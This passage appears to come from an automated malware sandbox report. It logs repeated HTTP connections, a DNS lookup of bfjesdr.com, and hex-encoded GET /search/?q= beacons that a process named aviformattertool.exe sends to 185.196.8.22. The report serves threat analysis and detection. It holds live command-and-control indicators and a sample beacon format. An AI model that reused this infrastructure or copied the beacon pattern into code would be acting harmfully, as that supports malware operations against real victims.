Jan 13, 2024 06:33:47.173468113 CET | 49808 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.174124956 CET | 49809 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.359277964 CET | 80 | 49808 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:47.359379053 CET | 49808 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.359884977 CET | 80 | 49809 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:47.359977007 CET | 49809 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.360348940 CET | 49809 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.546230078 CET | 80 | 49809 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:47.581254959 CET | 80 | 49809 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:47.581345081 CET | 49809 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.699724913 CET | 49809 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.700385094 CET | 49810 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.885603905 CET | 80 | 49809 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:47.885874987 CET | 49809 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.886167049 CET | 80 | 49810 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:47.886244059 CET | 49810 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:47.886632919 CET | 49810 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.072436094 CET | 80 | 49810 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:48.110296965 CET | 80 | 49810 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:48.110352993 CET | 49810 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.231163025 CET | 49810 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.231889009 CET | 49811 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.417247057 CET | 80 | 49810 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:48.417311907 CET | 49810 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.417501926 CET | 80 | 49811 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:48.417583942 CET | 49811 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.417948961 CET | 49811 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.603784084 CET | 80 | 49811 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:48.634325981 CET | 80 | 49811 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:48.634552956 CET | 49811 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.751009941 CET | 49811 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.751755953 CET | 49812 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.936925888 CET | 80 | 49811 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:48.937030077 CET | 49811 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.937582016 CET | 80 | 49812 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:48.937683105 CET | 49812 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:48.938045025 CET | 49812 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.123944998 CET | 80 | 49812 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:49.160002947 CET | 80 | 49812 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:49.160244942 CET | 49812 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.278000116 CET | 49812 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.278625965 CET | 49813 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.464046001 CET | 80 | 49812 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:49.464268923 CET | 49812 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.464452028 CET | 80 | 49813 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:49.464543104 CET | 49813 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.464920998 CET | 49813 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.650610924 CET | 80 | 49813 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:49.681108952 CET | 80 | 49813 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:49.681262970 CET | 49813 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.809413910 CET | 49813 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.810108900 CET | 49814 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.995415926 CET | 80 | 49813 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:49.995623112 CET | 49813 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.996079922 CET | 80 | 49814 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:49.996186018 CET | 49814 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:49.996552944 CET | 49814 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:50.182621002 CET | 80 | 49814 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:50.222256899 CET | 80 | 49814 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:50.222333908 CET | 49814 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:50.343775988 CET | 49814 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:50.344512939 CET | 49815 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:50.529742956 CET | 80 | 49814 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:50.529849052 CET | 49814 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:50.530417919 CET | 80 | 49815 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:50.530514956 CET | 49815 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:50.530996084 CET | 49815 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:50.716871023 CET | 80 | 49815 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:50.747817039 CET | 80 | 49815 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:50.747903109 CET | 49815 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:50.871721029 CET | 49815 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:50.872610092 CET | 49816 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.059303045 CET | 80 | 49815 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:51.059420109 CET | 49815 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.060254097 CET | 80 | 49816 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:51.060363054 CET | 49816 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.060671091 CET | 49816 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.246582031 CET | 80 | 49816 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:51.283536911 CET | 80 | 49816 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:51.283634901 CET | 49816 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.402827978 CET | 49816 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.403834105 CET | 49817 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.588895082 CET | 80 | 49816 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:51.588979006 CET | 49816 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.589720964 CET | 80 | 49817 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:51.589801073 CET | 49817 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.590154886 CET | 49817 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.776204109 CET | 80 | 49817 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:51.807215929 CET | 80 | 49817 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:51.807300091 CET | 49817 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.922252893 CET | 49817 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:51.922957897 CET | 49818 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:52.107934952 CET | 80 | 49817 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:52.108037949 CET | 49817 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:52.108711958 CET | 80 | 49818 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:52.108787060 CET | 49818 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:52.130019903 CET | 49818 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:52.316324949 CET | 80 | 49818 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:52.354525089 CET | 80 | 49818 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:52.354573965 CET | 49818 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:52.736371994 CET | 49818 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:52.736939907 CET | 49819 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:52.922256947 CET | 80 | 49818 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:52.922329903 CET | 49818 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:52.922672987 CET | 80 | 49819 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:52.922898054 CET | 49819 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:52.922993898 CET | 49819 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:53.108541012 CET | 80 | 49819 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:53.144440889 CET | 80 | 49819 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:53.144522905 CET | 49819 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:54.059453964 CET | 49819 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:54.059957981 CET | 49820 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:54.246432066 CET | 80 | 49819 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:54.246629953 CET | 49819 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:54.246706963 CET | 80 | 49820 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:54.246880054 CET | 49820 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:54.626684904 CET | 49820 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:54.812753916 CET | 80 | 49820 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:54.847461939 CET | 80 | 49820 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:54.847630024 CET | 49820 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:54.966784000 CET | 49820 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:54.967947960 CET | 49821 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:55.152877092 CET | 80 | 49820 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:55.152968884 CET | 49820 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:55.153748035 CET | 80 | 49821 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:33:55.153839111 CET | 49821 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:55.154104948 CET | 49821 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:33:55.339930058 CET | 80 | 49821 | 185.196.8.22 | 192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.376924038 CET8049821185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.376975060 CET4982180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.496412039 CET4982180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.497124910 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.682521105 CET8049821185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.682590008 CET4982180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.683015108 CET8049822185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.683223963 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.683355093 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:55.868922949 CET8049822185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.899401903 CET8049822185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:55.899507999 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.032516003 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.033149004 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.220143080 CET8049822185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.220316887 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.220637083 CET8049823185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.220880985 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.221788883 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.407759905 CET8049823185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.443429947 CET8049823185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.443500042 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.561737061 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.562374115 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.747785091 CET8049823185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.747863054 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.748186111 CET8049824185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.748262882 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.748717070 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.934422970 CET8049824185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.964922905 CET8049824185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.965070009 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.092747927 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.093262911 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.278981924 CET8049824185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.279062033 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.279408932 CET8049825185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.279465914 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.279830933 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.465795040 CET8049825185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.502969027 CET8049825185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.503017902 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.623537064 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.624026060 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.809464931 CET8049825185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.809514046 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.809839010 CET8049826185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.809928894 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.810183048 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.995918036 CET8049826185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.026194096 CET8049826185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.026258945 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.139451981 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.140327930 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.327105999 CET8049826185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.327320099 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.327867985 CET8049827185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.328063011 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.328392029 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.514048100 CET8049827185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.550244093 CET8049827185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.550474882 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.670381069 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.670813084 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.856224060 CET8049827185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.856313944 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.856755972 CET8049828185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.856834888 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.857187033 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.043917894 CET8049828185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.074208021 CET8049828185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.074261904 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.200572968 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.201003075 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.386620998 CET8049828185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.386648893 CET8049829185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.386712074 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.386739969 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.387161970 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.573246956 CET8049829185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.609313011 CET8049829185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.609384060 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.731683016 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.732168913 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.917459011 CET8049829185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.917975903 CET8049830185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.918032885 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.918066978 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.918338060 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.104904890 CET8049830185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.140093088 CET8049830185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.140274048 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.261449099 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.261945009 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.447417021 CET8049830185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.447921038 CET8049831185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.447983980 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.448024988 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.448271990 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.634329081 CET8049831185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.664535999 CET8049831185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.668303967 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.792817116 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.793345928 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.979012966 CET8049831185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.979033947 CET8049832185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.979090929 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.979135990 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.979515076 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.165193081 CET8049832185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.200164080 CET8049832185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.200252056 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.326400042 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.326916933 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.512120962 CET8049832185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.512213945 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.512717962 CET8049833185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.512814045 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.513159037 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.699073076 CET8049833185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.729543924 CET8049833185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.729702950 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.859256983 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.859735966 CET4983480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:02.045516014 CET8049833185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:02.045588017 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:02.046319008 CET8049834185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:02.046386003 CET4983480192.168.2.4185.196.8.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2024 06:32:49.695250988 CET | 55343 | 53 | 192.168.2.4 | 141.98.234.31
Jan 13, 2024 06:32:49.991533041 CET | 53 | 55343 | 141.98.234.31 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 13, 2024 06:32:49.695250988 CET | 192.168.2.4 | 141.98.234.31 | 0x78c6 | Standard query (0) | bfjesdr.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 13, 2024 06:32:49.991533041 CET | 141.98.234.31 | 192.168.2.4 | 0x78c6 | No error (0) | bfjesdr.com | | 185.196.8.22 | A (IP address) | IN (0x0001) | false
                                                                                                                                                        • bfjesdr.com
                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.449735185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:32:50.253227949 CET | 318 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608efa10c2ec9c9d3c HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:50.482608080 CET | 1286 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:32:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Jan 13, 2024 06:32:53.119539976 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:53.401035070 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:32:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:32:53.510107994 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:53.732130051 CET | 1286 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:32:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49739 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
